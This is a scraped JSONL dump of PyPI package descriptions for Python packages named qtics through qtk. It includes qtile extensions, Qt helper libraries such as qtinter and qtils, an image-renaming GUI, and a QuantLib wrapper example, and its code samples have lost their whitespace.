command:pipinstallqticsLatest version:To install the latest version, unreleased, you can first clone the repository\nwith:gitclonehttps://github.com/biqute/qtics.gitthen to install it in normal mode:pipinstall.Use poetry to install the latest version in developer mode, remember to also\ninstall the pre-commits!poetryinstall--withdocs,analysis,experiments\npre-commitinstallLicenseQtics is licensed under theApache License 2.0. See theLICENSEfile for details."} +{"package": "qtido", "pacakge-description": "qtidoest une biblioth\u00e8que Python(3) pour tracer des figures g\u00e9om\u00e9trique et faire des petits jeux.\nUne sorte de documentation est disponible surhttps://learn.heeere.com/python/reference-qtido/Elle est bas\u00e9e sur les principes de conception et buts suivants\u00a0:offrir une version de la bibloth\u00e8que dans la langue de l'apprenant (le fran\u00e7ais ici, mais qtido est con\u00e7ue pour \u00eatre traduite),offrir une interface de programmation imp\u00e9rative sans \"callback\" ni asynchronisme apparent,permettre, entre autre, de faire des animations \u00e0 interval de temp constant (si l'ordinateur est assez rapide),cr\u00e9er une abstraction qui permette un ex\u00e9cution des programmes aussi bien sur desktop (avec PyQt) que dans un navigateur (brython + impl\u00e9mentation en javascript de la biblioth\u00e8que)Le nom est un m\u00e9lange deQt(composant graphiques utilis\u00e9s par d\u00e9faut) et deido(langue universelle).Installationpip install qtidoExemple simplefromqtidoimport*defmickey(fen,x,y,rayon):\"\"\"Cette fonction trace un mickey\"\"\"couleur(fen,1,1,1)# Blancdisque(fen,x,y,rayon)# cX, cY, rayoncouleur(fen,1,0,0)# Rougedisque(fen,x+rayon/2,y-rayon,rayon/2-1)disque(fen,x-rayon/2,y-rayon,rayon/2-1)couleur(fen,0,0.7,0)# Vertdisque(fen,x,y,rayon/5)f=creer(400,200)# cr\u00e9er une fen\u00eatremickey(f,50,50,20)mickey(f,100,50,5)mickey(f,200,50,20)mickey(f,250,50,20)mickey(f,300,50,20)mickey(f,100,120,40)mickey(f,200,120,30)mickey(f,300,120,20)mickey(f,350,120,10)attendre_fermeture(f)"} +{"package": "qtier", "pacakge-description": "qtierCuter approach to Qt-for-python, with focus on type hints, JSON APIs and QML.Example Usage:The following example shows how qtier can be used to query a graphql service.models.pyfromqtier.itemsystemimportrole,define_roles@define_rolesclassWorm:name:str=role()family:str=role()size:int=role()@define_rolesclassApple:size:int=role()owner:str=role()color:str=role()# nested models are also supported!worms:Worm=role(default=None)qtier will create for youQAbstractListModelto be used in QML you only need to\ndefine your models withdefine_roles.\nqtier initializes the data with a dict, in this case coming from graphql service.main.pyimportglobimportosimportsysfrompathlibimportPathfromqtpy.QtQmlimportQQmlApplicationEnginefromqtpy.QtCoreimportQObject,SignalfromqtpyimportQtCore,QtGui,QtQml,QtQuickfromqtierimportslotfromqtier.gql.clientimportHandlerProto,GqlClientMessage,GqlWsTransportClientfromqtier.itemsystemimportGenericModelfromtests.test_sample_ui.modelsimportAppleclassEntryPoint(QObject):classAppleHandler(HandlerProto):message=GqlClientMessage.from_query(\"\"\"query MyQuery {apples {colorownersizeworms {familynamesize}}}\"\"\")def__init__(self,app:'EntryPoint'):self.app=appdefon_data(self,message:dict)->None:self.app.apple_model.initialize_data(message['apples'])defon_error(self,message:dict)->None:print(message)defon_completed(self,message:dict)->None:print(message)def__init__(self,parent=None):super().__init__(parent)main_qml=Path(__file__).parent/'qml'/'main.qml'QtGui.QFontDatabase.addApplicationFont(str(main_qml.parent/'materialdesignicons-webfont.ttf'))self.qml_engine=QQmlApplicationEngine()self.gql_client=GqlWsTransportClient(url='ws://localhost:8080/graphql')self.apple_query_handler=self.AppleHandler(self)self.gql_client.query(self.apple_query_handler)self.apple_model:GenericModel[Apple]=Apple.Model()QtQml.qmlRegisterSingletonInstance(EntryPoint,\"com.props\",1,0,\"EntryPoint\",self)# type: ignore# for some reason the app won't initialize without this event processing here.QtCore.QEventLoop().processEvents(QtCore.QEventLoop.ProcessEventsFlag.AllEvents,1000)self.qml_engine.load(str(main_qml.resolve()))@QtCore.Property(QtCore.QObject,constant=True)defappleModel(self)->GenericModel[Apple]:returnself.apple_modeldefmain():app=QtGui.QGuiApplication(sys.argv)ep=EntryPoint()# noqa: F841, this collected by the gc otherwise.ret=app.exec()sys.exit(ret)if__name__==\"__main__\":main()"} +{"package": "qtile", "pacakge-description": "A full-featured, hackable tiling window manager written and configured in PythonFeaturesSimple, small and extensible. It\u2019s easy to write your own layouts,\nwidgets and commands.Configured in Python.Runs as an X11 WM or a Wayland compositor.Command shell that allows all aspects of Qtile to be managed and\ninspected.Complete remote scriptability - write scripts to set up workspaces,\nmanipulate windows, update status bar widgets and more.Qtile\u2019s remote scriptability makes it one of the most thoroughly\nunit-tested window managers around.CommunityQtile is supported by a dedicated group of users. If you need any help, please\ndon\u2019t hesitate to fire off an email to our mailing list or join us on IRC. You\ncan also ask questions on the discussions board.Mailing List:https://groups.google.com/group/qtile-devQ&A:https://github.com/qtile/qtile/discussions/categories/q-aIRC:irc://irc.oftc.net:6667/qtileDiscord:https://discord.gg/ehh233wCrC(Bridged with IRC)Example codeCheck out theqtile-examplesrepo which contains examples of users\u2019 configurations,\nscripts and other useful links.ContributingPlease report any suggestions, feature requests, bug reports, or annoyances to\nthe GitHubissue tracker. There are also a fewtips & tricks,\nandguidelinesfor contributing in the documentation.Please also consider submitting useful scripts etc. to the qtile-examples repo\n(see above).Maintainers@tych0GPG:3CCA B226 289D E016 0C61 BDB4 18D1 8F1B C464 DCA3@ramnesGPG:99CC A84E 2C8C 74F3 2E12 AD53 8C17 0207 0803 487A@m-colGPG:35D9 2E7C C735 7A81 173E A1C9 74F9 FDD2 0984 FBEC@flacjacketGPG:58B5 F350 8339 BFE5 CA93 AC9F 439D 9701 E7EA C588@elParaguayoGPG:A6BA A1E1 7D26 64AD B97B 2C6F 58A9 AA7C 8672 7DF7@jwijenberghGPG:B1C8 1CF3 063B 5836 4946 3687 4827 061B D417 C233"} +{"package": "qtile-extras", "pacakge-description": "elParaguayo's Qtile ExtrasThis is a separate repo where I share things that I made for qtile that (probably) won't ever end up in the main repo.This things were really just made for use by me so your mileage may vary.Documentation can be foundhere."} +{"package": "qtile-mutable-scratch", "pacakge-description": "qtile MutableScratchThis package is a series of functions and a class to create a \"scratch\" space\nin qtile more similar to i3's. qtile has theScratchPadgroup type, but the\n(documented) purpose is to only hostDropdownwindows that must be specified\nahead of time.Instead, whatMutableScratchdoes is piggybacks onto an \"invisible\" qtileGroup(ie. a group named'') and provide functions to dynamically add and\nremove windows to this group. Viewing the \"hidden\" windows is done via a toggle\nfunction, which cycles through the windows in the Scratch group. All windows\nadded to theMutableScratchgroup will be automatically converted to\nfloating. This emulates the scratch functionality of i3 as closely as possible.Seerepository README for most up-to-date documentation.InstallationYou can now install viapip:pip install qtile_mutable_scratchSetupPut the following default configuration in yourconfig.py:importqtile_mutable_scratchfromlibqtile.configimportEzKeyfromlibqtileimporthook...mutscr=qtile_mutable_scratch.MutableScratch()groups.append(Group(''))# Must be after `groups` is createdkeys.extend([EzKey('M-S-',mutscr.add_current_window()),EzKey('M-C-',mutscr.remove_current_window()),EzKey('M-',mutscr.toggle()),])hook.subscribe.startup_complete(mutscr.qtile_startup)EachMutableScratchinstance has two parameters to chose from,scratch_group_nameandwin_attr.\nIt's not necessary to set these, as the default configuration\nshould work for every configuration.scratch_group_name(default'', or the empty name group) sets the name of the group that will old the scratch windows.win_attr(defaultmutscratch) sets the attribute that will be set on each window to tag it as being apart of theMutableScratchsystem.UsageAdd the current window to theMutableScratchgroup viaMutableScratch.add_current_window()This will move the window to the invisible groupRotate through windows in theMutableScratchgroup viaMutableScratch.toggle()If the current window is apart of theMutableScratchgroup, then it will be moved back to the invisible groupIf the current window is not apart of theMutableScratch, then the nextMutableScratchwindow in the stack will be moved to the current groupTo remove a window from theMutableScratchgroup, useMutableScratch.remove()Hastily thrown together demo video:It's ugly, but it get's the point across...hopefully.https://user-images.githubusercontent.com/20801821/147259912-5acec613-239b-4fe3-aebb-9c1820426d2c.mp4Implementation DetailsTracking members of theMutableScratchgroupThis is done by dynamically adding an attribute (by defaultmutscratch) to\nthe window object that simply stores a boolean.Cycling through windows inMutableScratchMutableScratchhas something similar to qtile'sfocus_historyfor groups.\nIt's effectively just a stack of windows belonging to theMutableScratchgroup, where windows are pushed and popped from the stack.\nDoing this,MutableScratchcontrols the order in which the windows are stored in the stack.\nThis ensures that the every window in theMutableScratchgroup can be accessed via toggle.Initializing theMutableScratchon qtile startWhen restarting qtile, theMutableScratchinstance inconfig.pywill be overwritten, losing the stack history and the floating window status of it's windows.\nTo stop this, we add ahookfunction tostartup_completethat will reinitialize a newMutableScratchinstance with the windows that are located in theMutableScratch.scratch_group_name."} +{"package": "qtile-passimapwidget", "pacakge-description": "qtile-passimapwidgetqtile-passimapwidget"} +{"package": "qtile-plasma", "pacakge-description": "No description available on PyPI."} +{"package": "qtile-profiles", "pacakge-description": "qtile-profilesIm using my laptop for work and private stuff and wanted to use some kind of profiles.InstallationYou can install the package using pippipinstallqtile-profilesUsagefromqtile_profilesimportProfile,ProfileManagerdefset_browser(browser:str):subprocess.run(f\"xdg-mime default{browser}x-scheme-handler/http\",shell=True,)subprocess.run(f\"xdg-mime default{browser}x-scheme-handler/https\",shell=True,)work=Profile(programs={# define some aliases for shorter commands later\"firefox\":\"firefox\",\"thunderbird\":\"flatpak run org.mozilla.Thunderbird\",# see 6 lines down\"teams\":\"chromium --app=https://teams.office.com\",},init=[# spawn these program when calling initialize(\"web\",[\"firefox\"]),(\"chat\",[\"mattermost-desktop\",\"teams\"]),(\"mail\",[\"tunderbird\"]),# here we can use thunderbird insead of calling flatpak(\"kp\",[\"keepassxc\"]),],on_load=lambdaqtile:set_browser(\"firefox.desktop\")# callback, call when profile is selected)privat=Profile(programs={\"firefox\":\"firefox -P privat\",\"thunderbird\":\"thunderbird\",\"discord\":\"discord\",},init=[(\"web\",[\"firefox\"]),(\"chat\",[\"signal-desktop\",\"discord\"]),(\"mail\",[\"thunderbird\"]),(\"kp\",[\"keepassxc\"]),],on_load=lambdaqtile:set_browser(\"firefox-privat.desktop\"))profiles=ProfileManager([work,privat])keys.extend([Key([super],\"p\",lazy.function(profiles.next_profile)),Key([super],\"f\",lazy.function(profiles.spawn,\"firefox\")),Key([super],\"i\",lazy.function(profiles.current_profile.spawn_init)),])"} +{"package": "qtile-window-trashbin", "pacakge-description": "qtile-window-trashbinQtile Extension to reopen closed windows. Never think \"Oh shit\" again when you close a window.InstallationYou can install the package using pippipinstallqtile-window-trashbinUsageThis module adds a \"Thrashbin\" class. Use it in your keybindings instead of kill. The pane will be killed after a given time.U could put the following in your ~/.config/qtile/config.pyfromtrashbinimportTrashbintrash_group=ScratchPad(\"killPane\")#We use an invisible Group: A ScratchPad.groups.extend([trash_group])# Let's append it to to groups.trash=Trashbin(trash_group.name,delay=5)# Initialize the Trashbin. Use the newly created Group to store the windows. Kill a Window put to the trashbin afert 5 seconds.keys.extend([Key([mod],\"q\",lazy.function(trash.append_currend_window)),# move to trashKey([mod,\"shift\"],\"q\",lazy.window.kill()),# real kill. Sometimes you want to kill insteadly.Key([mod,\"shift\"],\"e\",lazy.function(trash.pop_to_current_group))# Restore the last window put to the trashbin.])Afterwards you can hitSuper + qand the current window be moved to the trash.\nHitSuper + Shift + eto restore the last window, put to the trashbin.\nSometimes moving a window to the trash is not what you want.\nFor example when quiting an video player you may want to stop the playing immediately.\nHitSuper + Shift + qto quit immediatley. Caution: This is not undoable."} +{"package": "qtilities", "pacakge-description": "# qtilitiesA collection of utility programs for PyQt5 development.## Installation### From PyPIpip install qtilities### From sourcegit clone https://github.com/pylipp/qtilitiescd qtilitiesmake install## Contents### `pqp` and `pqpc`> Python QML Previewer and Client`pqp` previews QML components and continuously updates while you're editing the source code.#### StartLaunch an empty previewer:> pqpLaunch the previewer displaying one or more components by providing the paths:> pqp TextFoo.qml bar/ComboBaz.qml#### Loading componentsLoad components by clicking the 'Load' button.Alternatively you can run the client:> pqpc HackWindow.qmlIt sends one or more component paths via UDP to port 31415. The previewer `pqp` listens to that port and loads the components.#### Pausing/resuming preview`pqp` continuously updates, regardless of changes in the source code or not. If you wish to test user interaction functionality of your component, you can pause the preview by clicking the 'Preview' button.### `qmltags`> Basic ctags generator for QML components`qmltags` generates 'class' ctags for custom QML components.Run without arguments to recursively parse the current directory and its subdirectories for QML files> qmltagsAlternatively, you can provide one or more paths to QML components:> qmltags HackWindow.qml screen/*.qmlThis assumes that your shell performs file name expansion.Note that `qmltags` overwrites a `tags` file in the current working directory if it exists.### `pyqmlscene`> Basic Python port of the `qmlscene` utilityRun with a QML file holding an arbitrary component as argument:> pyqmlscene MyComponent.qml"} +{"package": "qtils", "pacakge-description": "OverviewQtils - pronounced as cutieels - is a syntactic sugar library to make sweet Python coding even sweeter.DedicationThis library is dedicated toP\u00e1l Hubai, Surfy, my programming Master who spent countless hours answering\nmy questions, providing code examples, and guiding me towards the right approach when I was learning programming\nas a child.FeaturesConvenient collectionsqdict,qlistandQEnumSelf-formatting object inPrettyObjectTwo-way formatter/parser for file sizes, for example \u20185.4 GB\u2019, inDataSizeWeak reference property decoratorweakpropertyCached property decoratorcachedpropertyClass logger decoratorloggedCommon string transformations inqtils.string_utilsResourcesSources are available onGitHubInstaller is available onPyPIUsage guide and more examples are available in thetutorialsDocumentation isavailable online on ReadTheDocsMigrating fromsutils? See thesutils migration guide here.Contributions are always welcome. Please see theDeveloper\u2019s guideon getting started.Getting StartedInstallationInstalling the latest release from PyPI usingpip:$pipinstallqtilsInstalling the latest release from PyPI and saving it torequirements.txtusingpip:$pipinstall-srequirements.txtqtilsInstalling the latest pre-release from GitHub:$pipinstall-ehttps://github.com/ultralightweight/qtils.git#masterExamplesAttribute dictionary>>>fromqtilsimport*>>>d=qdict(hello=\"world\")>>>d.hello'world'>>>d.answer=42>>>d['answer']42See more examples in theqdict tutorial, see the API referencehere.Objects with self-formatting capability>>>classMyObject(PrettyObject):...__pretty_fields__=[...'hello',...'answer',...]...def__init__(self,hello,answer):...self.hello=hello...self.answer=answer>>>obj=MyObject('world',42)>>>print(obj)<__main__.MyObjectobjectat...hello='world',answer=42>See more examples in thePrettyObject tutorial, see the API referencehereCached property>>>classDeepThought(object):...@cachedproperty...defanswer_to_life_the_universe_and_everything(self):...print('Deep Thought is thinking')...# Deep Thought: Spends a period of 7.5 million years...# calculating the answer...return42...>>>deep_thougth=DeepThought()>>>deep_thougth.answer_to_life_the_universe_and_everything# first call, getter is calledDeepThoughtisthinking42>>>deep_thougth.answer_to_life_the_universe_and_everything# second call, getter is not called42>>>deldeep_thougth.answer_to_life_the_universe_and_everything# removing cached value>>>deep_thougth.answer_to_life_the_universe_and_everything# getter is called againDeepThoughtisthinking42See more examples in thecachedproperty tutorial, see the API referencehere.Weak reference property>>>fromqtilsimportweakproperty>>>classFoo(object):...@weakproperty...defbar(self,value):pass>>># The code above is the functional equivalent of writing:>>>importweakref>>>classFoo(object):...@property...defbar(self,value):...returnself._bar()ifself._barisnotNoneelseNone...@bar.setter...defbar(self,value):...ifvalueisnotNone:...value=weakref.ref(value)...self._bar=value>>>See more examples in theweakproperty tutorial, see the API referencehere.Formatting and parsing file sizes>>>print(DataSize(123000))123k>>>DataSize('1.45 megabytes')1450000>>>DataSize('1T').format(unit=\"k\",number_format=\"{:,.0f}{}\")'1,000,000,000 k'See more examples in theformatting module tutorial, see the API referencehere.Dynamic module exports>>>fromqtilsimportqlist>>>__all__=qlist()>>>@__all__.register...classFoo(object):...passSee more examples in theqlist tutorial, see the API referencehere.Adding a class-private logger>>>@logged...classLoggedFoo():...def__init__(self):...self.__logger.info(\"Hello World from Foo!\")...See more examples in thelogging module tutorial, see the API referencehere.ContributingPull requests are always welcome! Please see theDeveloper\u2019s Guideon getting started with qtils development.LicenceThis library is available underGNU Lesser General Public Licence v3."} +{"package": "qTimer", "pacakge-description": "A small command line extendable timer that integrates with various project\nmanagement solutions.Installation and ConfigurationqTimer can be install via the\n[Python Package Index](http://pypi.python.org/pypi/qTimer) or via\nsetup.py. qTimer depends upon\n[SQLAlchemy](http://pypi.python.org/pypi/SQLAlchemy) and\n[Alembic](http://pypi.python.org/pypi/alembic) to run.You should take the time to configure qTimer before running it for the first\ntime. Basic configuration is to copy the dist-packages/qtimer/default.ini to\n$HOME/.qtimer and then change the url and token. You can also configure things\nsuch as how long will qTimer cache data from remote sources and how much will\nit round time in both display and posting. The[alembic]and[loggers]sections are for advanced users only, and the average user should probably\nsteer clear of those.Extending qTimerIf you\u2019re interested in extending qTimer take a look at the plugins folder\nand the commands folder.A command is a class which provides a sub-parser and business logic\nfor a given sub-command. See commands folder and command.py for detailsA plugin represents a way of retrieving data from a remote source. Plugins\nare required to have the magic method load_qtimer_plugin(url, token). See\nplugins/plugin.prototype.py for more details."} +{"package": "qtimgren", "pacakge-description": "qtimgrenDescriptionThis is a GUI around thepyimgrenpackage. Currently it is able to rename camera images\nvia pyimgren forth and back. Its main feature is that it allows a manual\nselection of the images to rename.Of course buttons are there to allow default selections.It is based onprofiles. Forqtimgren, a profile is what is required for\npyimgren configuration:a foldera source pattern to identify camera images (typically IMG*.JPG or DSCF*.JPG)a compatible withdatatime.strftimepattern to build the new name from\nthe JPEG timestampand of course a unique nameThanks to pyimgren, it is possible to use a delta in minutes to cope with\na digital camera having a wrong time.In order to make image selection easier, thumbnails can be displayed in the\nmain application window along with the current, future and original names. But\nas image computation and display are expensive tasks, the display can be\nturned off. Anyway, the computation is asynchronous, meaning that the\napplication can be used as soon as the currently displayed images are\navailable.InstallationDirect installation on WindowsThanks to PyInstaller and InnoSetup, an installer and a portable zip file\nare available onGithub.That way you have no dependencies, not even on Python.From PyPIpip install qtimgrenFrom GithubThis is the recommended way if you want to contribute or simply tweakqtimgrento your own requirements. You can get a local copy by\ndownloading a zipfile but if you want to make changes, you should\nrather clone the repository to have access to allgitgoodies:git clone https://github.com/s-ball/qtimgren.gitYou can then install it in your main Python installation or in a venv with:pip install -e .or on Windows with the launcher:py -m pip install -e .Alternatively, you can use thesetup.pyscript to build the unversioned\nfiles without installing anything:python setup.py buildSpecial handling ofversion.py:QtImgrenrelies onsetuptools-scmto automatically extract a\nversion number from git metadata and store it in aversion.pyfile\nfor later use. The requires the availability of bothgit(which should\nnot be a problem when the project is downloaded from Github), andsetuptools-scm. If it fails because one is not available or because\ngit metadata is not there (if you only downloaded a zip archive from\nGithub), the version is set to 0.0.0For that reason, if you do not use git to download the sources, you\nshould download a source distribution from PyPI, because the latter\ncontains a validversion.pypipuses thepyproject.tomlfile with respect to PEP-518 and\nPEP-517 to know thatsetuptools-scmis required before the build.Basic useOnce installed, you can run the application:qtimgrenInternationalizationThe application is natively written is English, and contains a French\ntranslation of its IHM. It depends on Qt Linguist tools for generating the\nbinary file used at run-time. The required toollreleaseexists in the\nWindows PySide2 distribution, but not in Linux or Mac ones. On those\nplatforms, you need a to install the Qt development tools and ensure that\nthey are accessible via the path.Of course, if you install from a PyPi wheel, the compiled message files are\nincluded as a resource.At run time, the system default language is used by default, or can be\nexplicitly specified with the--langoption:qtimgren --lang=fr # forces fr language\nqtimgren --lang=C # forces native english languageContributionsContributions are welcome, including translations or just issues on GitHub.\nProblems are expected to be documented so that they can be reproduced. But\nI only develop this on my free time, so I cannot guarantee quick answers...Disclaimer: beta qualityAll functionalities are now implemented, and the underlying pyimgren module\nhas been used for years. I trust it enough to handle my own photographies\nwith it. Yet it still lacks a decent documentation, and\nhas not been extensively testedLicenseThis work is licenced under a MIT Licence. SeeLICENSE.txt"} +{"package": "qtim_tools", "pacakge-description": "UNKNOWN"} +{"package": "qt-installer", "pacakge-description": "yaqti (Yet Another QT Installer - ya-q-ti!)Overviewyaqtiis a basic unofficial CLI Qt installer; designed to keep things as stupid as possible. It lets you install different Qt5 and Qt6 versions with optional modules such as QtCharts, QtNetworkAuth ect all in a single command,# install yaqtipipinstallyaqti# install Qt!python-myaqtiinstall--oswindows--platformdesktop--version6.2.0--modulesqtchartsqtquick3d, optionally the--set-envcan be specified. This setsQt5_DIR/Qt6_DIRso CMake can find the installation.--install-depscan be specified, on Linux platforms to install Qt dependencies fromapt-get.\nIt can also be used as a github action,- name: Install Qt\n uses: WillBrennan/yaqti\n with:\n version: '6.2.0'\n host: 'linux'\n target: 'desktop'\n modules: 'qtcharts qtwebengine'. By default, the github-action will set the enviroment variables for Qt and install Qt dependencies. For a real-world example visitdisk_usage, the project this was made for.OptionsversionThe version of Qt to install, for example6.2.0or5.15.2. It checks the version is valid.osThe operating system you'll be running onlinux,windows, ormac.platformThe platform you'll be building for,desktop,winrt,android, orios.modulesThe optional Qt modules to install such as,qtcharts,qtpurchasing,qtwebengine,qtnetworkauth,qtscript,debug_info.output-default: ./qtThe directory to install Qt in, it will put it in aversionsub directory. By default if you install--version=5.15.2it will install qt into./qt/5152.--set-envsDesigned for use in CI pipelines; this sets enviromental variables such asPATH,Qt5_DIR, andQt6_DIRso CMake can find Qt and you can use executables directly.--install-depsDesigned for use in CI pipelines. This installs dependencies required by Qt on Linux platforms. If this flag is provided on non-linux platforms it does nothing.Why Another Qt CLI Installer?I've had issues with other CLI installers in the past,They'll silently fail to download a module if you typeqchartsinstead ofqtchartsThis fetches module and addon configurations directly from the Qt Archive, new modules and versions will appear without the tool updating!It keeps module names the same between Qt5 and Qt6 despite Qt moving them around a bit.I like to keep things stupidly simple!How does it work?!Qt provides theQt Archive, this script simply works out what 7zip files to fetch and unpacks them to the specified installation directory. Then if you want, it sets the enviroment variable so CMake can find the install."} +{"package": "qtinter", "pacakge-description": "qtinter \u2014 Interop between asyncio and Qt for Pythonqtinteris a Python module that brings together asyncio and Qt\nfor Python, allowing you to use one from the other seamlessly.Read thefull documentationor check out the quickstart below.Installation$ pip install qtinterUsing asyncio from QtTo use asyncio-based libraries in Qt for Python, encloseapp.exec()inside context managerqtinter.using_asyncio_from_qt().Example (taken fromexamples/clock.py):\"\"\"Display LCD-style digital clock\"\"\"importasyncioimportdatetimeimportqtinter# <-- import modulefromPySide6importQtWidgetsclassClock(QtWidgets.QLCDNumber):def__init__(self,parent=None):super().__init__(parent)self.setDigitCount(8)defshowEvent(self,event):self._task=asyncio.create_task(self._tick())defhideEvent(self,event):self._task.cancel()asyncdef_tick(self):whileTrue:t=datetime.datetime.now()self.display(t.strftime(\"%H:%M:%S\"))awaitasyncio.sleep(1.0-t.microsecond/1000000+0.05)if__name__==\"__main__\":app=QtWidgets.QApplication([])widget=Clock()widget.setWindowTitle(\"qtinter - Digital Clock example\")widget.resize(300,50)withqtinter.using_asyncio_from_qt():# <-- enable asyncio in qt codewidget.show()app.exec()Using Qt from asyncioTo use Qt components from asyncio-based code, enclose the asyncio\nentry-point inside context managerqtinter.using_qt_from_asyncio().Example (taken fromexamples/color.py):\"\"\"Display the RGB code of a color chosen by the user\"\"\"importasyncioimportqtinter# <-- import modulefromPySide6importQtWidgetsasyncdefchoose_color():dialog=QtWidgets.QColorDialog()dialog.show()future=asyncio.Future()dialog.finished.connect(future.set_result)result=awaitfutureifresult==QtWidgets.QDialog.DialogCode.Accepted:returndialog.selectedColor().name()else:returnNoneif__name__==\"__main__\":app=QtWidgets.QApplication([])withqtinter.using_qt_from_asyncio():# <-- enable qt in asyncio codecolor=asyncio.run(choose_color())ifcolorisnotNone:print(color)Using modal dialogsTo execute a modal dialog without blocking the asyncio event loop,\nwrap the dialog entry-point inqtinter.modal()andawaiton it.Example (taken fromexamples/hit_100.py):importasyncioimportqtinterfromPySide6importQtWidgetsasyncdefmain():asyncdefcounter():nonlocalnwhileTrue:print(f\"\\r{n}\",end='',flush=True)awaitasyncio.sleep(0.025)n+=1n=0counter_task=asyncio.create_task(counter())awaitqtinter.modal(QtWidgets.QMessageBox.information)(None,\"Hit 100\",\"Click OK when you think you hit 100.\")counter_task.cancel()ifn==100:print(\"\\nYou did it!\")else:print(\"\\nTry again!\")if__name__==\"__main__\":app=QtWidgets.QApplication([])withqtinter.using_qt_from_asyncio():asyncio.run(main())Requirementsqtintersupports the following:Python version: 3.7 or higherQt binding: PyQt5, PyQt6, PySide2, PySide6Operating system: Linux, MacOS, WindowsLicenseBSD License.ContributingPlease raise an issue if you have any questions. Pull requests are more\nthan welcome!Creditsqtinteris derived fromqasyncbut rewritten from\nscratch. qasync is derived fromasyncqt, which is derived fromquamash."} +{"package": "qtinteract", "pacakge-description": "qtinteractA library for building fast interactive plots in Jupyter notebooks using Qt Widgets.Installationpip install qtinteractUsage%gui qt5 \n\nfrom math import pi\nfrom qtinteract import iplot\n\ndef f(x, a):\n return np.sin(a*x)\n\nx = np.linspace(0, 2*pi, 101)\n\niplot(x, f, a=(1., 5.))"} +{"package": "qtip", "pacakge-description": "QTIP provides Benchmarking as a Service for OPNFV community[![License](https://img.shields.io/github/license/opnfv/qtip.svg)](https://git.opnfv.org/qtip/tree/LICENSE)\n[![Jenkins](https://img.shields.io/jenkins/s/https/build.opnfv.org/ci/view/qtip/job/qtip-verify-master.svg)](https://build.opnfv.org/ci/view/qtip/job/qtip-verify-master/)\n[![Jenkins coverage](https://img.shields.io/jenkins/c/https/build.opnfv.org/ci/view/qtip/job/qtip-verify-master.svg)](https://build.opnfv.org/ci/view/qtip/job/qtip-verify-master/cobertura)\n[![PyPI](https://img.shields.io/pypi/v/qtip.svg)](https://pypi.python.org/pypi/qtip)\n[![Docker Pulls](https://img.shields.io/docker/pulls/opnfv/qtip.svg)](https://hub.docker.com/r/opnfv/qtip/)See [project wiki](https://wiki.opnfv.org/display/qtip) for more information."} +{"package": "qtip-api", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtip-cli", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtip-client-cli", "pacakge-description": "No description available on PyPI."} +{"package": "qtjMath", "pacakge-description": "No description available on PyPI."} +{"package": "qtjq", "pacakge-description": "No description available on PyPI."} +{"package": "qt-jsonschema-form", "pacakge-description": "qt-jsonschema-formA tool to generate Qt forms from JSON Schemas.FeaturesError messages from JSONSchema validation (see jsonschema).Widgets for file selection, colour picking, date-time selection (and more).Per-field widget customisation is provided by an additional ui-schema (inspired byhttps://github.com/mozilla-services/react-jsonschema-form).Unsupported validatorsCurrently this tool does not supportanyOforoneOfdirectives. The reason for this is simply that these validators have different semantics depending upon the context in which they are found. Primitive support could be added with meta-widgets for type schemas.Additionally, the$refkeyword is not supported. This will be fixed, but is waiting on some proposed upstream changes injsonschemaExampleimportsysfromjsonimportdumpsfromqtpyimportQtWidgetsfromqt_jsonschema_formimportWidgetBuilderif__name__==\"__main__\":app=QtWidgets.QApplication(sys.argv)builder=WidgetBuilder()schema={\"type\":\"object\",\"title\":\"Number fields and widgets\",\"properties\":{\"schema_path\":{\"title\":\"Schema path\",\"type\":\"string\"},\"integerRangeSteps\":{\"title\":\"Integer range (by 10)\",\"type\":\"integer\",\"minimum\":55,\"maximum\":100,\"multipleOf\":10},\"event\":{\"type\":\"string\",\"format\":\"date\"},\"sky_colour\":{\"type\":\"string\"},\"names\":{\"type\":\"array\",\"items\":[{\"type\":\"string\",\"pattern\":\"[a-zA-Z\\-'\\s]+\",\"enum\":[\"Jack\",\"Jill\"]},{\"type\":\"string\",\"pattern\":\"[a-zA-Z\\-'\\s]+\",\"enum\":[\"Alice\",\"Bob\"]},],\"additionalItems\":{\"type\":\"number\"},}}}ui_schema={\"schema_path\":{\"ui:widget\":\"filepath\"},\"sky_colour\":{\"ui:widget\":\"colour\"}}form=builder.create_form(schema,ui_schema)form.widget.state={\"schema_path\":\"some_file.py\",\"integerRangeSteps\":60,\"sky_colour\":\"#8f5902\",\"names\":[\"Jack\",\"Bob\"]}form.show()form.widget.on_changed.connect(lambdad:print(dumps(d,indent=4)))app.exec_()NotesThis package usesQtPyas an abstraction layer for PyQt5/PySide2/PyQt6/PySide6. One of those libraries must also be installed in order to function."} +{"package": "qt-json-setting", "pacakge-description": "pyqt\u8bbe\u7f6e\u751f\u6210\u5668\u4e00\u4e2a\u53ef\u4ee5\u6839\u636ejson schema\u81ea\u52a8\u751f\u6210\u8bbe\u7f6e\u754c\u9762\u7684\u5de5\u5177\u529f\u80fd:\u9519\u8bef\u63d0\u793a\u9009\u9879\u63cf\u8ff0\u9ed8\u8ba4\u503c\u63d0\u793a\u62d3\u5c55\u8bed\u6cd5item_list:\n\u4f60\u53ef\u4ee5\u901a\u8fc7\u6307\u5b9aitem_list\u6765\u9650\u5b9a\u5185\u5bb9\n\u4f8b\u5982:\"optional\":{\"type\":\"string\",\"title\":\"test2\",\"item_list\":[\"bule\",\"green\",\"yellow\"]}\u6548\u679c:"} +{"package": "qtk", "pacakge-description": "# Quant Python ToolKitThis package is intended to be a layer above QuantLib Python and a few other quantitative librariesto be more accessible for quantitative finance calculations.## Minimal ExampleHere is a minimal example for valuing a bond using a provided zero rates.from qtk import Controller, Field as F, Template as Tdata = [{'Compounding': 'Compounded','CompoundingFrequency': 'Annual','Currency': 'USD','DiscountBasis': '30/360','DiscountCalendar': 'UnitedStates','ListOfDate': ['1/15/2015', '7/15/2015', '1/15/2016'],'ListOfZeroRate': [0.0, 0.005, 0.007],'ObjectId': 'USD.Zero.Curve','Template': 'TermStructure.Yield.ZeroCurve'},{'DiscountCurve': '->USD.Zero.Curve','ObjectId': 'BondEngine','Template': 'Engine.Bond.Discounting'},{'AccrualCalendar': 'UnitedStates','AccrualDayConvention': 'Unadjusted','AsOfDate': '2016-01-15','Coupon': 0.06,'CouponFrequency': 'Semiannual','Currency': 'USD','DateGeneration': 'Backward','EndOfMonth': False,'IssueDate': '2015-01-15','MaturityDate': '2016-01-15','ObjectId': 'USD.TBond','PaymentBasis': '30/360','PricingEngine': '->BondEngine','Template': 'Instrument.Bond.TreasuryBond'}]res = Controller(data)asof_date = \"1/15/2015\"ret = 